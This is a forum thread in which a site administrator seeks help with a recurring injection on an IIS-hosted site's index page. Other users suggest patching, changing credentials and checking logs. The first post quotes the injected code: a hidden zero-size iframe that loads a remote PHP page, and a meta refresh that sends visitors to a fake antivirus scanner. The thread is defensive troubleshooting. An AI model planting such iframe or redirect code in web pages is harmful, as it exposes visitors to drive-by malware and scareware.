bla.php script added to website

[100%Agave]

I have many websites hosted on our servers, so far only 1 website has had this script added to it's web pages.  This has happened numerous times and only seems to affect this one site and so far has only been added to the index.htm page.

I have removed it every time but it reappears about once per month.

If anyone can shed some light on this and what would be my best course of action, I would appreciate it.

This is what I see in the webpage itself.

<!-- ~ --><iframe src="http://gtswiat.pl/grafika/gora2/ss/bla.php" width=0 height=0 border=0></iframe>

<meta http-equiv="Refresh" content="0; URL=http://www.avxp-2008.net/scanner/f4aed1aad924015ac4cc3d829e89a296/5/">

<!-- ~ -->

I did notice that the meta http-equiv with the scanner url is new this time.

Thanks for your assistance.

[Kayrac]

http://hackademix.net/2008/04/26/mass-attack-faq/

start with reading that

#2 update your app's, and remove offending code

#3 after all apps updated and you've read the above to familarize yourself with whats going on, see if it continues after removal, then go from there

-Brian

PS that fake antivirus meta tag is brand new, it'll probably continue to change constantly, that antivirus has basically 0 detection

http://www.virustotal.com/analisis/e46394a6e7ecdf1a50cbac801712334d

[100%Agave]

I'm a little lost.  This particular website does not have a database.

What exactly am I looking for in the code and are we talking about actual code pages like .php, .asp, and .js?

[Kayrac]

your looking for that iframe thing, whats your website i'll check it out tonight when i wake up and see if i can find any for you

The other stuff i'm not sure the SQL injection isn't really my thing, i just kinda know what to remove to 'fix' the pages

[100%Agave]

Thanks, I already removed the script and only found it on the index page.  I have been removing it about once a month for the last several months but it keeps coming back.  I am going to change the ftp access logins again for this site.

Since this site does not have a database, I am more concerned with how the script keeps getting put on that page.  I have already checked the permissions necessary to access that page and as far as I can see no one would be able to gain access except for the site owner or someone that guessed the site owners login into.

I am searching now to see if the script is on any other pages but I spot checked and didn't find it.

If I can't get more info about this, I will send you the site so you can take a look at it.

Thanks,

[SysAdMini]

Can you tell us the url of your site ?

Maybe we could find the vulnerability.

[100%Agave]

Yes it is http://www.bareboard.com.

When I say that there is no database attached, that is not exactly, literally correct.  There is now a separate application that does have a database but it has only been there for about 1 - 2 weeks and is not in it's final form.

I checked the database and went through all of the tables but did not find anything that would have been added onto any of the fields.  I am still not clear on what I am supposed to be looking for, but thought maybe it would be the EXEC statement added onto the data in a field.

If that is not right, could you point me in the right direction?

Thanks again.

[Orac]

I see your using; MicrosoftOfficeWebServer: 5.0_Pub

Personaly iam only familar with *nix servers and cant comment about M$officewebserver.

All i can suggest is that you make sure all your server software is fully uptodate and patched with all available fixes from M$.

[SysAdMini]

You run a IIS server and told us, that infections have already occured before you had installed a database.
So we can exclude a SQL injection attack.

I couldn't detect anything suspicious at your site. Are you sure that your server is fully patched ?

[100%Agave]

Thanks.  As far as I know that server is patched and up to date.  I will check to be sure.  We do not do automatic updates because if the server auto restarts it causes problems for the customers.

The server in question should be IIS6 because it is windows server 2003.

[100%Agave]

SysAdMini,

Thanks for the response.  It is IIS and the infections were definitely occuring before there was a database.  I checked the database for anything malicious that might have been attached to a field and did not find anything.  I removed the url redirects that were in the iframe and the meta-equiv tag this morning as soon as I came in.  Unless they are getting more active, it will be about a month before it happens again.  I am beginning to think that maybe the customer has a bad index page that he keeps replacing the good one with but I will have to check the logs for that.

I will check for the patches and make sure that they are up to date.  I was pretty sure that this was done just recently but let me run the update and see what comes up.

Thanks for taking a look.  I have changed the FTP and FP access passwords for this site.  I guess I will just have to wait and see if it happens again.

I am going to look through the log files and see if I can find out who may have logged into that site.

Thanks again.